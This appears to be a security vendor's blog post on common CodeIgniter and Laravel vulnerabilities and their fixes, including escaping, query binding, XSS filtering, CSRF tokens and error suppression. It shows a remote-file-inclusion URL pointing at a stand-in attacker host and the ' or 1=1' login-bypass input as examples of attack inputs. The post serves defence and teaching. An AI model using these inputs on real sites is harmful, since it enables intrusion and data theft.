Codeigniter or Laravel Website Hacked? Common Vulnerabilities of Codeigniter& Laravel with Fixes

Laravel and Codeigniter are both popular PHP framework used to build websites. Their popularity can also be accredited to the open source nature of the two frameworks. However, the users must understand that deploying sites using these frameworks doesn’t make them safe. It is the secure development practices that matter. SQL injection in Codeigniter and SQL injection in Laravel are the two most common security topics trending on the help forums. Apart from SQLi, unsafe development practices also make the sites vulnerable to XSS, CSRF, RFI etc attacks. According to John D. McGregor, author of Practical Guide to Testing Object-Oriented Software,

In many ways, being a good tester is harder than being a good developer because testing requires not only a very good understanding of the development process and its products, but it also demands an ability to anticipate likely faults and errors.

Hacked Codeigniter and Laravel Website: Examples

Attacks like SQL injection in Codeigniter or Laravel can compromise the website. Such attacks are fairly common and widespread. Therefore, a large number of users suffering similar attacks can be found asking for help on the Laravel community forum or the Codeigniter community forum. Some such examples are given below.

SQL injection Codeigniter and laravel
SQL injection Codeigniter

Symptoms of Codeigniter or Laravel Hack

  • Laravel or Codeigniter phishing pages designed to steal sensitive info appear on the website.
  • Users complain about getting redirected to malicious sites.
  • Gibberish content appears on Laravel or Codeigniter site due to Japanese Keyword Hack or Pharma Hack etc.
  • The Laravel or Codeigniter website becomes very slow & shows error messages.
  • While using a third-party hosting, ‘Your account has been suspended!’ message appears.
  • The Laravel or Codeigniter site gets blacklisted by search engines.
  • Error logs show certain attacks like SQL Injection in Codeigniter on the site.
  • Logs show login to the website from remote IPs.
  • New, Rogue admins appear in the login database.

Codeigniter or Laravel website hacked?. Drop us a message on the chat widget and we’d be happy to help you fix. it. Fix my hacked Laravel/Codeigniter website.

Basic Causes of Codeigniter or Laravel Hack

1) Codeigniter or Laravel Hack: Injection Attacks

a) SQL Injection in Codeigniter or Laravel

SQL Injection in Codeigniter is a very common attack which is widely prevalent over the web. As the name suggests, the attack targets the database of the server. Exploiting SQL Injection in Codeigniter, the attacker can:

  • Retrieve data from the database.
  • Edit the contents of the database(includes dropping the entire database!)
  • In some cases, getting a reverse shell.
  • Bypass authentication using input like or 1=1.

b) PHP Code Injection in Codeigniter/Laravel

PHP Code Injection is another type of common vulnerability which allows attackers to execute code on the Laravel/Codeigniter website. However, it is different from command injection in the sense that the attacker can execute only the commands of that particular language. Command injection allows an attacker to execute commands via a reverse shell. For example, the vulnerable parameter can be supplied with a link to a malicious file which contains PHP code to be executed i.e. http://testsite.com/?page=http://evilsite.com/evilcode.php

This file may contain functions like phpinfo() which can be used to gain information.

2) Codeigniter or Laravel Hack: Cross-Site Scripting in Codeigniter/Laravel

XSS vulnerability occurs in the Laravel/Codeigniter websites due to the lack of input sanitization. Both the frameworks have security functions specifically designed to avoid these attacks. Exploiting an XSS attack, the attackers can:

  • Phish users to steal cookies and other sensitive session data.
  • Redirect users to a malicious site.
  • Used to bypass same-origin policy.

3) Laravel or Codeigniter Hack: Cross-Site Request Forgery in Codeigniter/Laravel

This attack is aimed at tricking users to perform unwanted actions. However, this type of attack can only be used to manipulate the data(deleting forms, etc) not to steal or read it. In the worst case scenario, if the victim is the admin, the entire application can be destroyed. This attack uses social engineering tricks to lure victims to click on a link which executes commands like deleting an account in the background.

Codeigniter or Laravel website hacked?. Drop us a message on the chat widget and we’d be happy to help you fix. it. Fix my hacked Laravel/Codeigniter website.

4) Protecting your Codeigniter/Laravel Website

Codeigniter or Laravel Hack: Avoiding SQL Injection in Codeigniter

Codeigniter comes with tons of security features. Some of them include functions and libraries to avoid SQL injection in Codeigniter. In this article, I will explain 3 main methods to accomplish the task one by one.

Codeigniter or Laravel Hack: Escaping Queries in Codeigniter

Escaping the data before submitting it to the PHP application would sanitize it. Therefore, it is a secure practice which must be regularly followed. Even the escaping queries can be completed via three methods:

  1. $this->db->escape(): Determines the data type before escaping
  2. $this->db->escape_str(): Does not determine the data type, simply escapes it.
  3. $this->db->escape_like_str(): Can be used with conditions.

To further clarify, look at the code snippet given below.

<?php
$email= $this->input->post(’email’);
$query = ‘SELECT * FROM subscribers_tbl WHERE user_name=’.$this->db->escape($email);
$this->db->query($query);
?>

In this code, the function $this->db->escape() first determines the data type in order to escape only the string data. Moreover, it also adds the single quotes around the input data automatically. This prevents SQL Injection in Codeigniter.

Codeigniter or Laravel Hack: Binding Queries in Codeigniter

Binding queries can also simplify the code apart from sanitizing the input in Codeigniter website. This method lets the system put queries thereby reducing the complexity for the developer. For instance, look at the code snippet given below.

<?php $sql = “SELECT * FROM subscribers_tbl WHERE status = ? AND email= ?”; $this->db->query($sql, array(‘active’, ‘[email protected]’));?>

Here you may notice some question marks in the first line instead of values. Due to query binding, these question marks are replaced from the values in the array in the second line. In the previous example we saw manual query escaping but here, this method accomplishes it automatically. Thereby stopping SQL Injection in Codeigniter.

Codeigniter or Laravel Hack: Active Class Record in Codeigniter

Active records feature of Codeigniter allows us to perform database operation with minimum lines of code or scripting. Since it is a function of the system itself, the query escaping is done automatically. For example, all data of the table can be retrieved by one simple query:

$query = $this->db->get(‘mytable’);

Codeigniter or Laravel Hack: Avoiding SQL Injection in Laravel

The object-relational mapping in Laravel uses PHP object data binding to sanitize user input which in turn prevents SQL injection Laravel. Parameter binding also adds quotes automatically, thereby preventing dangerous input like or 1=1 from bypassing authentication.

$results = DB::select(‘select * from users where id = :id’, [‘id’ => 1]);

This here is an implementation of a named binding query in Laravel.

Codeigniter or Laravel Hack: Avoiding Cross-Site Scripting in Codeigniter

To prevent possible XSS attacks, Codeigniter comes with a pre-built XSS filter. In case this filter encounters a malicious request, it converts it onto its character entity thereby keeping the application safe. This filter can be accessed via the xss_clean() method:

$data = $this->security->xss_clean($data);

However, sometimes the attackers can inject malicious code within the image files. To prevent such attacks, the uploaded files can also be checked for security. For instance, look at the code given below.

if ($this->security->xss_clean($file, TRUE) === FALSE)

{

// file failed the XSS test

}

This code will return a Boolean value of True if the image is safe and vice versa. However, it is noteworthy here that it is advisable to use html_escape() method if you wish to filter HTML attribute values.

Codeigniter or Laravel Hack: Avoiding Cross Site Scripting Laravel

Using escape string, XSS attacks can be avoided in Laravel websites. Escape strings will prevent unsanitized input from being implemented. However, it is noteworthy here that in Laravel versions >5.1, this feature is enabled by default. Therefore, when input like this: <div>{{ $task->names }}</div> is provided to the Laravel versions above 5.1, the application will not be vulnerable due to automatic query escaping. Moreover, limiting the length of user-supplied input can also prevent certain types of XSS and SQLi attacks. This can be done via HTML code given below.

<input type=”text” name=”task” maxlength=”10″>

The same can be implemented via a JS function. Moreover, the {% raw %} {{}} {% endraw %} syntax in Laravel can by default escape any malicious HTML entities passed. Also, certain libraries are specifically designed for this task which could be used to prevent Laravel XSS. If you use a templating engine like Blade, it would automatically use escaping to prevent such attacks.

Codeigniter or Laravel Hack: Preventing CSRF Attacks in Codeigniter

CSRF protection can be enabled in Codeigniter by editing the application/config/config.php file. Simply append the following code to the file:

$config[‘csrf_protection’] = TRUE;

For the users who use Form Helper, then the function form_open() can by default insert a hidden CSRF token field in forms. The other way to implement CSRF protection is to use get_csrf_token_name() and get_csrf_hash(). For reference look at the two code snippets given below of a form and a server-side implementation.

$csrf = array(

‘name’ => $this->security->get_csrf_token_name(),

‘hash’ => $this->security->get_csrf_hash());

——————————————————————–

<input type=”hidden” name=”<?=$csrf[‘name’];?>” value=”<?=$csrf[‘hash’];?>” />

Regeneration of tokens is also another secure practise to prevent Codeigniter CSRF attacks. However, token regeneration can be problematic as the users may need re validation after navigating to other tabs. Token regeneration can be done by the following config parameter:

$config[‘csrf_regenerate’] = TRUE;

Codeigniter or Laravel Hack: Preventing CSRF Attacks in Laravel

Tokens are implemented into Laravel forms to protect from CSRF attacks. These tokens are then called using an AJAX call which can be found embedded in each form. The data from the request token is matched with the one stored on the server for the user’s session checking for anomalies. CSRF tokens can be passed into the forms using the following code (Blade Templates Implementation):

<form name=”CSRF Implementation”>

{!! csrf_field() !!}

<!– Other inputs can come here–>

</form>

However, the CSRF token can be added by default while using the LaravelCollective/HTML package.

Codeigniter or Laravel Hack: Block Error Reporting

File errors are helpful in the development environment. However, on the web, Codeigniter file errors can leak potentially sensitive information to the attackers. Therefore, it is a safe practice to turn off error reporting.

PHP Errors

To turn off PHP error reporting, use the index.php file. Simply pass zero as argument to error_reporting() function. Look at the example given below for reference.

error_reporting(0);

However, for CodeIgniter version 2.0.1 and above, the environment constant in the index.php file can be set to “production” in order to disable PHP error outputs.

Database Errors

Database errors can be disabled by editing the application/config/database.php file. Simply set the db_debug option to FALSE. Look at the example given below for reference:

$db[‘default’][‘db_debug’] = FALSE;

Error Logging

A smart way would be to transfer the errors occurring to the log files which would prevent them from displaying. The log threshold option of the /config/config.php file can be set to 1 for this purpose. Look at the example given below.

$config[‘log_threshold’] = 1;

Use a Web Application Firewall for Laravel or Codeigniter

Even the experts may miss out on certain parameters which could make the Laravel/Codeigniter site vulnerable. Moreover, the attackers are constantly finding new ways to compromise your site. Therefore, another secure practice is to use a firewall or security solution of some sort. Astra is one such security solution designed to meet your flexible demands. Pay only for what you use. Astra is an out of the box security solution with rates starting as low as $9 per month. Just drop us a message and get one step closer to securing your PHP code. Get a demo now!

Astra provides a comprehensive security audit for your Laravel or Codeigniter website with 80+ active tests, a right mix of automated & manual testing.

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

A computer nerd. Loves working with Sqlmap and BeEF (the software) ;) Has experience in wireless pen tests. Owns a chatbot on Pandorabots named Mark1. In free time he can be found saving some goals.

1 Comment

  1. Great Article it its really informative and innovative keep us posted with new updates. its was really valuable. thanks a lot.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close